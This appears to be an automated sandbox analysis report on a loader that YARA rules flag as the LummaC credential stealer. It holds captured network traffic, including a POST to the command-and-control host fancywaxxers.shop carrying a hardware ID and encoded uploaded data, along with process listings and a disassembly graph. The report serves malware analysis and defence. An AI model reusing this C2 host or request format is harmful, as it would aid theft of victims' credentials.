                                                                            2024-12-29 22:37:04 UTC15331OUTData Raw: 74 76 22 16 ee bf f2 12 a2 5e 1d 95 af 92 1f 9c 5f be 86 1f 77 03 a8 81 e5 8c aa 87 e9 ff da 24 68 d8 44 b1 6d c4 94 65 74 27 de 5e e6 74 a6 a2 c1 a7 d5 08 2d 60 a9 a1 f1 79 15 f5 e7 63 b7 6d 58 7a 33 ab c0 7b 73 5a ee 0a 5e 78 88 c8 c6 32 1b 65 28 8b 5a 9b c4 ed 07 b5 c0 19 0c 2c 0d 9d ad 4f af 0b f3 3a 34 75 f3 3a 57 b0 7a b9 55 33 41 ec 46 e5 8b 25 34 25 d1 26 51 0b dc d8 ea 1c a9 73 06 75 92 fc 27 6c 97 86 4c 88 ee 39 cc cb 82 4d e4 db 74 6d f7 22 93 ff d0 f5 71 36 c3 95 98 28 bb df 2b ce 77 19 84 5f ee d8 b0 48 b8 63 2d 7a b8 61 88 b0 96 59 47 13 16 7c 83 87 20 3e ed 49 4b db 74 54 d5 f4 3d ff f5 3b 54 ba f1 67 94 ab ec 58 64 d8 c0 07 89 8c f4 e6 b5 61 e9 3f 65 3e 9b 97 9c 7d 68 79 83 6c 35 5a 82 37 ba 5d cc 62 35 3a 04 43 53 41 2b 80 43 c2 16 85 b6
                                                                            Data Ascii: tv"^_w$hDmet'^t-`ycmXz3{sZ^x2e(Z,O:4u:WzU3AF%4%&Qsu'lL9Mtm"q6(+w_Hc-zaYG| >IKtT=;TgXda?e>}hyl5Z7]b5:CSA+C
                                                                            2024-12-29 22:37:04 UTC15331OUTData Raw: 84 39 4a 81 dc 18 14 26 65 08 74 37 54 10 6e 0b ce 2d c2 b8 20 3e 00 2d af 1a 26 d8 29 71 86 f5 73 15 aa cb aa 00 5a a1 9c 87 d8 e6 ed b4 0d 5c 3b d6 d9 bc 59 70 9c ee b3 ee 55 de e5 4c d1 0b d7 37 a5 5c e9 32 69 16 05 98 26 a5 da 1a 7d 05 c5 b9 6d b3 dd 6c 8e 0c 9f 3b 26 04 0e 14 c7 5c 28 2f 5c 94 15 46 9d 2c f2 c8 ed 17 76 6d f0 91 de 2b da e6 3b 3b 2c 50 73 81 e7 45 44 c0 ec 18 1c fc 36 06 ed 01 87 5d 27 5d 56 fa 78 50 d4 d5 a8 da 34 6e 8d 27 bb 3e 40 23 23 dd c9 ec b6 f5 90 f3 51 15 c9 f9 7a e2 c4 6b 9f 50 ea de 5d c7 de 3e 6c fd 5e d9 f8 99 fb 6b b9 de d7 7e fd c5 6b 45 4f 09 ab f3 98 d5 bc dc ca 9d e4 91 39 ae 9f 43 8b 5a 29 7b da 90 36 9a b7 c8 61 6d aa b6 d8 1a 10 57 17 dc f8 c6 59 d2 43 83 6e fc 6e 24 99 70 f5 e0 fd e4 a1 8e a9 c2 0b 60 55 89 95
                                                                            Data Ascii: 9J&et7Tn- >-&)qsZ\;YpUL7\2i&}ml;&\(/\F,vm+;;,PsED6]']VxP4n'>@##QzkP]>l^k~kEO9CZ){6amWYCnn$p`U
                                                                            2024-12-29 22:37:06 UTC1136INHTTP/1.1 200 OK
                                                                            Date: Sun, 29 Dec 2024 22:37:06 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=jnu1crie07dno73a36mainpr5f; expires=Thu, 24 Apr 2025 16:23:44 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4L1mUBaJ4CBOGikBS0ZzUONv4oi77eXqw%2Bi4tXZYGeQ9F98yuLvKNWWG3TrPfek8mi9zWwNrLRH05gvExmk2b40IncLEW%2F256KwbWSgcj03xyagWbkkTKeRA9Nek%2Fcj6UXZlkQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f9d45c6bf754344-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1762&min_rtt=1715&rtt_var=677&sent=327&recv=603&lost=0&retrans=0&sent_bytes=2844&recv_bytes=588833&delivery_rate=1702623&cwnd=47&unsent_bytes=0&cid=41510f8b1eed9a91&ts=2113&x=0"


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.549717104.21.32.14435780C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-29 22:37:06 UTC265OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 88
                                                                            Host: fancywaxxers.shop
                                                                            2024-12-29 22:37:06 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 79 6f 75 6e 67 65 73 73 74 74 26 6a 3d 26 68 77 69 64 3d 45 42 43 33 37 45 32 45 39 37 46 35 32 46 35 43 31 42 38 32 35 45 35 30 36 46 30 32 31 37 32 37
                                                                            Data Ascii: act=get_message&ver=4.0&lid=BVnUqo--@youngesstt&j=&hwid=EBC37E2E97F52F5C1B825E506F021727
                                                                            2024-12-29 22:37:07 UTC1124INHTTP/1.1 200 OK
                                                                            Date: Sun, 29 Dec 2024 22:37:07 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=eenu7mt19ktadvsurafsbt6f1c; expires=Thu, 24 Apr 2025 16:23:46 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QqFoG2wlTd3qKRv7IJ7ZpGCMIKzBkTl789nFG6NhM0YWIvD9vK4jw2bO3AV1iZvxT47CYkPZGUjg7XSZqcqAWcucjaUFRt6MjqT4%2FGUN10ZpqnHXP4bnn2STZMZ3SB7fHSDWUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f9d45d6aced4344-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1790&rtt_var=675&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=989&delivery_rate=1615938&cwnd=47&unsent_bytes=0&cid=e358544b2b3310f0&ts=456&x=0"
                                                                            2024-12-29 22:37:07 UTC245INData Raw: 34 38 66 0d 0a 4b 53 4c 34 78 35 45 51 46 53 44 74 73 55 53 77 6a 71 6f 30 77 63 35 63 7a 76 48 79 78 39 49 36 49 68 58 65 64 71 38 59 74 6e 52 79 57 64 71 68 35 54 49 76 45 63 47 54 49 5a 4b 30 6d 78 6a 6a 71 6e 37 30 30 36 50 79 6c 51 31 36 51 5a 31 43 31 31 76 47 4f 47 49 62 72 4a 66 46 5a 46 73 58 69 4e 38 75 33 64 4b 46 55 61 61 35 4f 36 4f 2f 78 71 32 51 55 57 46 48 37 51 62 33 54 73 59 68 5a 6c 76 41 69 66 56 64 64 30 71 6f 2b 69 2b 49 2f 4a 74 35 2b 49 46 73 2f 59 58 45 6f 70 31 59 47 79 4f 61 4e 65 78 42 68 52 35 6b 5a 61 6d 4e 32 58 56 35 52 4c 72 64 45 66 2f 63 33 77 58 78 75 53 6d 44 6f 49 4f 55 71 30 78 33 62 2b 35 42 2b 33 32 46 42 42 30 58 6a 76 54 2b 58 56 78 71 68 39 51 4e 78 39 54 72 58 36 4b 4e 43 76 2b 51
                                                                            Data Ascii: 48fKSL4x5EQFSDtsUSwjqo0wc5czvHyx9I6IhXedq8YtnRyWdqh5TIvEcGTIZK0mxjjqn7006PylQ16QZ1C11vGOGIbrJfFZFsXiN8u3dKFUaa5O6O/xq2QUWFH7Qb3TsYhZlvAifVdd0qo+i+I/Jt5+IFs/YXEop1YGyOaNexBhR5kZamN2XV5RLrdEf/c3wXxuSmDoIOUq0x3b+5B+32FBB0XjvT+XVxqh9QNx9TrX6KNCv+Q
                                                                            2024-12-29 22:37:07 UTC929INData Raw: 70 4a 4f 4c 44 6d 42 41 70 44 66 69 59 74 4d 51 57 45 6e 42 6b 4e 56 33 53 51 2b 6b 78 77 48 59 79 66 77 48 6d 36 59 66 2b 61 43 6a 6a 4f 56 69 63 33 79 55 4e 4e 77 74 2b 53 52 47 45 59 75 6a 2b 69 52 51 62 5a 7a 4a 46 76 66 36 36 55 47 30 39 68 65 67 73 70 71 6d 6c 47 4e 50 54 37 51 6b 6d 58 58 76 52 30 4e 42 6f 49 62 62 57 46 74 4d 74 2b 49 6f 36 4f 69 66 42 4c 75 68 4b 37 75 38 6f 37 61 42 51 31 52 41 70 45 43 59 54 4e 4d 69 58 56 6a 4e 6d 37 35 41 65 6d 32 6e 2b 79 37 56 78 39 31 67 67 4b 55 34 2b 4b 66 44 70 6f 52 72 46 6c 4c 70 4c 76 74 62 32 51 78 71 55 72 53 4d 71 45 52 46 64 4a 6e 2f 63 39 48 67 77 41 61 64 34 54 6d 70 68 70 57 41 6e 41 35 4c 66 62 55 31 2f 53 76 47 4c 48 39 53 72 6f 48 36 63 6d 46 45 6f 50 30 75 39 63 58 42 51 50 62 2f 45 66 65
                                                                            Data Ascii: pJOLDmBApDfiYtMQWEnBkNV3SQ+kxwHYyfwHm6Yf+aCjjOVic3yUNNwt+SRGEYuj+iRQbZzJFvf66UG09hegspqmlGNPT7QkmXXvR0NBoIbbWFtMt+Io6OifBLuhK7u8o7aBQ1RApECYTNMiXVjNm75Aem2n+y7Vx91ggKU4+KfDpoRrFlLpLvtb2QxqUrSMqERFdJn/c9HgwAad4TmphpWAnA5LfbU1/SvGLH9SroH6cmFEoP0u9cXBQPb/Efe
                                                                            2024-12-29 22:37:07 UTC1369INData Raw: 33 32 33 39 0d 0a 39 77 73 42 78 69 71 55 76 76 4d 43 2f 2f 70 30 4b 45 57 48 6f 45 2b 42 36 6a 30 4a 74 59 62 75 65 6f 6e 6c 59 5a 37 7a 37 44 4e 58 69 7a 6d 4f 74 6d 78 4f 63 68 4d 50 33 70 55 39 76 52 4b 38 6c 31 6d 37 6a 44 68 6b 56 72 4b 4b 69 59 43 45 56 6d 34 49 72 2f 63 66 67 58 71 53 48 4b 35 53 77 6d 61 50 6b 62 42 4e 30 69 43 65 61 58 34 45 73 66 57 48 4d 76 39 4a 67 57 57 76 55 35 52 54 6b 2b 75 51 44 70 4b 41 32 6f 36 33 64 6f 72 56 4e 52 58 69 51 51 73 56 61 33 54 64 37 45 59 69 66 78 32 42 44 5a 49 62 54 4d 4e 54 44 35 6c 36 45 68 54 65 39 67 38 4f 4b 36 33 55 53 4a 71 70 41 79 6c 66 55 54 52 39 6d 75 34 54 49 49 33 78 74 71 75 41 4f 2b 4f 76 47 55 4a 61 69 43 59 47 6a 68 2f 62 69 54 56 64 59 6a 77 66 38 59 63 41 68 55 78 4c 50 6b 2f 51 6a
                                                                            Data Ascii: 32399wsBxiqUvvMC//p0KEWHoE+B6j0JtYbueonlYZ7z7DNXizmOtmxOchMP3pU9vRK8l1m7jDhkVrKKiYCEVm4Ir/cfgXqSHK5SwmaPkbBN0iCeaX4EsfWHMv9JgWWvU5RTk+uQDpKA2o63dorVNRXiQQsVa3Td7EYifx2BDZIbTMNTD5l6EhTe9g8OK63USJqpAylfUTR9mu4TII3xtquAO+OvGUJaiCYGjh/biTVdYjwf8YcAhUxLPk/Qj
                                                                            2024-12-29 22:37:07 UTC1369INData Raw: 52 7a 38 73 4c 66 48 35 65 4d 50 61 61 54 70 6f 79 7a 64 33 56 2f 6d 45 54 69 59 74 49 2b 47 31 43 79 6a 66 64 62 66 31 47 38 69 48 54 67 2f 4d 5a 79 39 49 64 70 6b 74 36 55 38 62 52 37 53 46 76 6f 4a 75 6c 70 2f 41 4a 63 55 71 43 41 39 43 68 44 52 62 6e 79 46 74 6e 35 6d 6d 61 6a 72 53 61 68 6e 49 65 6d 69 30 68 2b 4f 70 74 41 32 57 7a 7a 4d 48 39 59 6c 37 4b 6a 66 53 42 51 74 2f 63 33 2f 50 33 70 41 34 2b 62 62 59 57 30 71 6f 4f 4f 46 57 4e 63 6a 51 44 4c 4c 39 4d 61 51 30 2b 70 72 4e 42 44 63 6b 36 39 38 77 37 30 2f 65 6c 69 6e 65 45 54 68 4c 79 78 38 37 70 52 64 6c 36 6f 41 38 78 69 30 54 68 43 63 38 69 53 33 43 6c 61 45 4e 37 46 63 74 53 2f 34 6d 79 72 76 41 71 34 6b 36 4b 39 74 58 31 6a 58 35 5a 64 39 55 37 6a 4d 6b 5a 70 72 49 6e 35 59 32 77 54 6d
                                                                            Data Ascii: Rz8sLfH5eMPaaTpoyzd3V/mETiYtI+G1Cyjfdbf1G8iHTg/MZy9Idpkt6U8bR7SFvoJulp/AJcUqCA9ChDRbnyFtn5mmajrSahnIemi0h+OptA2WzzMH9Yl7KjfSBQt/c3/P3pA4+bbYW0qoOOFWNcjQDLL9MaQ0+prNBDck698w70/elineEThLyx87pRdl6oA8xi0ThCc8iS3ClaEN7FctS/4myrvAq4k6K9tX1jX5Zd9U7jMkZprIn5Y2wTm
                                                                            2024-12-29 22:37:07 UTC1369INData Raw: 36 77 6d 53 57 75 78 43 5a 68 37 69 75 6c 55 41 55 5a 4c 73 55 6c 6d 33 6d 46 30 38 55 71 71 61 6e 65 53 4a 30 69 2f 6f 52 30 37 6d 62 56 36 75 38 44 2f 36 49 77 4c 36 4b 62 68 5a 78 6a 42 33 73 58 73 78 4d 47 48 69 65 6e 39 52 70 54 47 66 47 30 67 4c 61 32 38 73 44 38 4c 73 4f 67 4c 50 47 68 65 4a 63 64 6b 43 4e 4a 50 68 49 31 44 56 61 53 71 69 71 70 58 56 4e 46 4c 7a 36 4b 34 50 6d 78 46 71 4e 6f 77 44 68 6c 35 75 43 6f 33 46 4f 5a 4a 51 6b 34 31 44 76 4d 47 49 57 71 35 48 48 57 6b 31 4a 71 2f 59 79 78 76 2f 41 5a 66 57 4b 4c 4b 75 6b 75 6f 69 30 59 46 70 66 6a 43 54 32 66 4d 35 48 57 58 71 75 74 38 52 38 55 45 2b 4a 35 51 6e 30 32 65 52 2f 68 66 6b 34 2f 36 4f 55 67 36 6f 4b 59 32 65 56 4f 76 35 4f 32 53 42 45 59 61 47 62 76 6d 52 63 5a 6f 6a 48 41 39
                                                                            Data Ascii: 6wmSWuxCZh7iulUAUZLsUlm3mF08UqqaneSJ0i/oR07mbV6u8D/6IwL6KbhZxjB3sXsxMGHien9RpTGfG0gLa28sD8LsOgLPGheJcdkCNJPhI1DVaSqiqpXVNFLz6K4PmxFqNowDhl5uCo3FOZJQk41DvMGIWq5HHWk1Jq/Yyxv/AZfWKLKukuoi0YFpfjCT2fM5HWXqut8R8UE+J5Qn02eR/hfk4/6OUg6oKY2eVOv5O2SBEYaGbvmRcZojHA9
                                                                            2024-12-29 22:37:07 UTC1369INData Raw: 6a 34 67 59 6e 71 57 47 69 65 56 66 54 48 47 4d 51 35 73 75 68 79 4e 2b 57 4d 44 7a 77 33 64 57 63 72 47 65 4b 65 62 59 36 46 57 43 70 53 61 58 69 37 2b 7a 35 51 4d 53 51 49 77 44 35 6e 76 33 4f 47 74 52 71 76 48 47 58 33 64 55 32 49 49 53 2f 75 7a 6e 48 2f 43 6f 61 4b 76 46 74 76 4f 4b 62 6e 73 6c 71 53 43 45 58 73 45 44 58 47 65 55 6b 74 6b 6d 64 45 47 55 31 78 58 38 35 75 4e 6a 69 59 6f 35 70 37 36 6b 73 6f 4e 38 64 48 71 54 4d 63 64 7a 30 6b 4a 2f 45 35 6d 52 35 6c 5a 57 66 4d 4b 43 4d 76 75 34 32 58 4f 4c 69 7a 4b 48 77 59 71 77 35 56 4e 51 50 6f 63 75 33 48 4c 71 57 31 41 62 7a 71 48 72 4a 33 5a 79 31 4d 59 58 37 4b 48 48 59 66 65 63 50 66 71 64 76 70 4f 7a 51 68 56 2f 6d 7a 33 45 53 39 55 4f 66 47 75 55 68 73 30 2f 66 47 69 4f 77 52 58 48 31 50 78
                                                                            Data Ascii: j4gYnqWGieVfTHGMQ5suhyN+WMDzw3dWcrGeKebY6FWCpSaXi7+z5QMSQIwD5nv3OGtRqvHGX3dU2IIS/uznH/CoaKvFtvOKbnslqSCEXsEDXGeUktkmdEGU1xX85uNjiYo5p76ksoN8dHqTMcdz0kJ/E5mR5lZWfMKCMvu42XOLizKHwYqw5VNQPocu3HLqW1AbzqHrJ3Zy1MYX7KHHYfecPfqdvpOzQhV/mz3ES9UOfGuUhs0/fGiOwRXH1Px
                                                                            2024-12-29 22:37:07 UTC1369INData Raw: 4c 65 63 79 34 4b 39 53 47 77 68 69 55 44 43 59 76 73 51 58 57 79 31 76 71 4e 56 66 55 4f 34 36 41 58 59 36 50 70 33 6c 35 52 73 75 4c 4f 5a 6c 49 46 39 64 30 47 49 42 76 70 30 38 77 64 4e 57 4c 57 31 2b 56 70 48 45 49 48 55 44 65 58 76 2f 52 2b 75 67 42 69 6c 75 37 36 6d 34 46 78 4d 66 70 77 67 7a 6c 7a 30 47 33 4e 71 6e 61 76 31 52 33 6c 7a 75 4f 49 73 67 64 66 64 65 70 6a 2b 4d 35 36 46 77 5a 47 63 41 6e 4a 64 69 44 58 63 64 38 49 32 66 30 71 31 38 39 74 36 50 68 43 4b 35 78 4c 49 79 39 35 43 2b 61 59 32 75 4c 62 47 38 37 39 75 56 53 79 63 4e 66 63 68 2f 43 67 47 59 4d 6d 54 71 46 34 69 52 59 50 55 4c 66 7a 4a 37 31 2b 78 6f 79 76 33 70 36 4b 47 6e 45 39 37 51 72 46 46 79 31 37 59 41 45 74 32 69 59 6a 58 51 47 64 30 71 4f 42 30 35 63 4f 54 65 2f 48 39
                                                                            Data Ascii: Lecy4K9SGwhiUDCYvsQXWy1vqNVfUO46AXY6Pp3l5RsuLOZlIF9d0GIBvp08wdNWLW1+VpHEIHUDeXv/R+ugBilu76m4FxMfpwgzlz0G3Nqnav1R3lzuOIsgdfdepj+M56FwZGcAnJdiDXcd8I2f0q189t6PhCK5xLIy95C+aY2uLbG879uVSycNfch/CgGYMmTqF4iRYPULfzJ71+xoyv3p6KGnE97QrFFy17YAEt2iYjXQGd0qOB05cOTe/H9
                                                                            2024-12-29 22:37:07 UTC1369INData Raw: 61 41 36 77 73 57 56 35 77 45 31 57 7a 61 42 68 70 52 6c 62 37 6f 4a 6e 39 31 70 6f 67 51 34 50 6d 66 51 6f 54 6c 42 59 62 4a 79 71 71 6a 55 45 56 34 6b 45 4c 72 49 64 73 51 55 57 75 79 69 63 5a 43 63 32 57 47 30 7a 44 55 33 74 31 6f 37 6f 59 73 75 61 48 46 6b 61 68 67 5a 33 71 50 45 4a 78 56 38 42 67 43 5a 36 75 31 35 6c 5a 4a 44 35 6e 38 4c 4e 2f 4a 39 68 75 59 6a 51 6e 34 75 6f 44 32 70 32 68 70 58 34 6c 46 33 6c 48 7a 4a 6d 31 77 71 62 32 68 4a 30 46 46 33 74 34 68 36 74 66 69 59 6f 79 68 45 4c 75 7a 78 76 4b 68 41 78 70 47 6d 44 50 57 55 2b 70 62 55 45 6d 56 6c 4f 4e 42 55 31 69 43 31 68 62 31 77 4f 78 77 6b 5a 6f 6f 67 4d 61 58 72 2b 64 57 56 58 43 54 41 65 74 68 78 6b 49 43 52 38 43 44 35 55 77 36 52 4b 6e 51 43 65 48 61 33 51 57 4d 69 78 47 43 6d
                                                                            Data Ascii: aA6wsWV5wE1WzaBhpRlb7oJn91pogQ4PmfQoTlBYbJyqqjUEV4kELrIdsQUWuyicZCc2WG0zDU3t1o7oYsuaHFkahgZ3qPEJxV8BgCZ6u15lZJD5n8LN/J9huYjQn4uoD2p2hpX4lF3lHzJm1wqb2hJ0FF3t4h6tfiYoyhELuzxvKhAxpGmDPWU+pbUEmVlONBU1iC1hb1wOxwkZoogMaXr+dWVXCTAethxkICR8CD5Uw6RKnQCeHa3QWMixGCm
                                                                            2024-12-29 22:37:07 UTC1369INData Raw: 41 66 6a 71 4b 45 35 78 33 31 30 46 5a 46 5a 65 47 79 46 6c 42 52 61 54 47 48 75 62 6c 79 55 65 58 74 42 4f 59 6c 4d 65 50 2b 57 4a 33 56 75 70 50 78 6e 66 73 50 77 4a 59 71 49 2f 31 58 57 52 46 68 2f 30 70 33 66 76 43 63 36 61 69 4b 50 72 48 6f 4b 75 64 61 46 74 58 68 6a 4c 6c 54 65 45 66 54 55 36 63 6b 76 4e 35 58 47 75 4b 33 6a 61 48 77 35 4a 77 38 62 51 73 2b 4c 79 48 70 5a 30 4d 5a 48 43 64 4f 63 46 79 6a 6a 4e 2b 53 72 43 50 31 33 52 43 54 4c 58 2b 46 73 65 2f 6d 6e 43 30 68 54 2b 2f 75 72 47 79 71 30 42 56 59 34 6f 78 77 58 66 55 51 56 70 4d 6c 34 54 49 57 58 4a 46 6f 59 55 65 2f 75 58 4f 64 35 65 32 43 35 69 56 75 49 43 59 59 6e 4e 61 36 6b 2f 47 64 2f 77 2f 48 6d 71 6f 69 39 39 64 63 30 57 47 37 57 76 64 39 4e 39 54 67 36 6b 77 6e 4d 57 45 76 37
                                                                            Data Ascii: AfjqKE5x310FZFZeGyFlBRaTGHublyUeXtBOYlMeP+WJ3VupPxnfsPwJYqI/1XWRFh/0p3fvCc6aiKPrHoKudaFtXhjLlTeEfTU6ckvN5XGuK3jaHw5Jw8bQs+LyHpZ0MZHCdOcFyjjN+SrCP13RCTLX+Fse/mnC0hT+/urGyq0BVY4oxwXfUQVpMl4TIWXJFoYUe/uXOd5e2C5iVuICYYnNa6k/Gd/w/Hmqoi99dc0WG7Wvd9N9Tg6kwnMWEv7


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:17:36:53
                                                                            Start date:29/12/2024
                                                                            Path:C:\Users\user\Desktop\R3nz_Loader.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\R3nz_Loader.exe"
                                                                            Imagebase:0xa10000
                                                                            File size:706'048 bytes
                                                                            MD5 hash:B43D8ECA7777B170DDC40A824AB10BB6
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:1
                                                                            Start time:17:36:53
                                                                            Start date:29/12/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6d64d0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:3
                                                                            Start time:17:36:53
                                                                            Start date:29/12/2024
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                            Imagebase:0x2e0000
                                                                            File size:43'016 bytes
                                                                            MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2082382204.0000000002AE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2065068299.0000000002AE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:6
                                                                            Start time:17:36:54
                                                                            Start date:29/12/2024
                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2684 -s 1224
                                                                            Imagebase:0x3f0000
                                                                            File size:483'680 bytes
                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Disassembly

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:13.6%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:7.2%
                                                                              Total number of Nodes:1480
                                                                              Total number of Limit Nodes:22
                                                                              execution_graph 11443 6cef90eb IsProcessorFeaturePresent 12196 6cef6be9 12199 6cef699e 12196->12199 12197 6cef0a90 _ValidateLocalCookies 5 API calls 12198 6cef69ab 12197->12198 12199->12197 12263 6cef51a8 GetCommandLineA GetCommandLineW 12200 6cef29e5 12201 6cef3378 37 API calls 12200->12201 12202 6cef29ed 12201->12202 12264 6cef33a4 12265 6cef33a7 12264->12265 12266 6cef3429 __fassign 37 API calls 12265->12266 12267 6cef33b3 12266->12267 12203 6cef1de0 12204 6cef1dfe 12203->12204 12215 6cef1da0 12204->12215 12216 6cef1dbf 12215->12216 12217 6cef1db2 12215->12217 12218 6cef0a90 _ValidateLocalCookies 5 API calls 12217->12218 12218->12216 12278 6cef2160 12279 6cef2172 12278->12279 12281 6cef2180 12278->12281 12280 6cef0a90 _ValidateLocalCookies 5 API calls 12279->12280 12280->12281 12282 6cef6560 12285 6cef64e7 12282->12285 12286 6cef64f3 ___scrt_is_nonwritable_in_current_image 12285->12286 12293 6cef3bda EnterCriticalSection 12286->12293 12288 6cef652b 12294 6cef6549 12288->12294 12289 6cef64fd 12289->12288 12291 6cef68f5 __fassign 14 API calls 12289->12291 12291->12289 12293->12289 12297 6cef3c22 LeaveCriticalSection 12294->12297 12296 6cef6537 12297->12296 11534 6cef2e7d 11545 6cef4e6a 11534->11545 11539 6cef2e9a 11541 6cef3f43 _free 14 API calls 11539->11541 11543 6cef2ec9 11541->11543 11544 6cef3f43 _free 14 API calls 11544->11539 11546 6cef4e73 11545->11546 11550 6cef2e8f 11545->11550 11580 6cef3a04 11546->11580 11551 6cef532b GetEnvironmentStringsW 11550->11551 11552 6cef5398 11551->11552 11553 6cef5342 11551->11553 11554 6cef2e94 11552->11554 11555 6cef53a1 FreeEnvironmentStringsW 11552->11555 11556 6cef523d ___scrt_uninitialize_crt WideCharToMultiByte 11553->11556 11554->11539 11563 6cef2ecf 11554->11563 11555->11554 11557 6cef535b 11556->11557 11557->11552 11558 6cef62bc 15 API calls 11557->11558 11559 6cef536b 11558->11559 11560 6cef5383 11559->11560 11561 6cef523d ___scrt_uninitialize_crt WideCharToMultiByte 11559->11561 11562 6cef3f43 _free 14 API calls 11560->11562 11561->11560 11562->11552 11565 6cef2ee4 11563->11565 11564 6cef3ee6 _free 14 API calls 11574 6cef2f0b 11564->11574 11565->11564 11566 6cef2f70 11567 6cef3f43 _free 14 API calls 11566->11567 11568 6cef2ea5 11567->11568 11568->11544 11569 6cef3ee6 _free 14 API calls 11569->11574 11570 6cef2f72 11929 6cef2f9f 11570->11929 11574->11566 11574->11569 11574->11570 11576 6cef2f92 11574->11576 11578 6cef3f43 _free 14 API calls 11574->11578 11920 6cef33cf 11574->11920 11575 6cef3f43 _free 14 API calls 11575->11566 11935 6cef3e26 IsProcessorFeaturePresent 11576->11935 11578->11574 11579 6cef2f9e 11581 6cef3a0f 11580->11581 11582 6cef3a15 11580->11582 11583 6cef5691 _free 6 API calls 11581->11583 11584 6cef56d0 _free 6 API calls 11582->11584 11604 6cef3a1b 11582->11604 11583->11582 11585 6cef3a2f 11584->11585 11586 6cef3ee6 _free 14 API calls 11585->11586 11585->11604 11589 6cef3a3f 11586->11589 11590 6cef3a5c 11589->11590 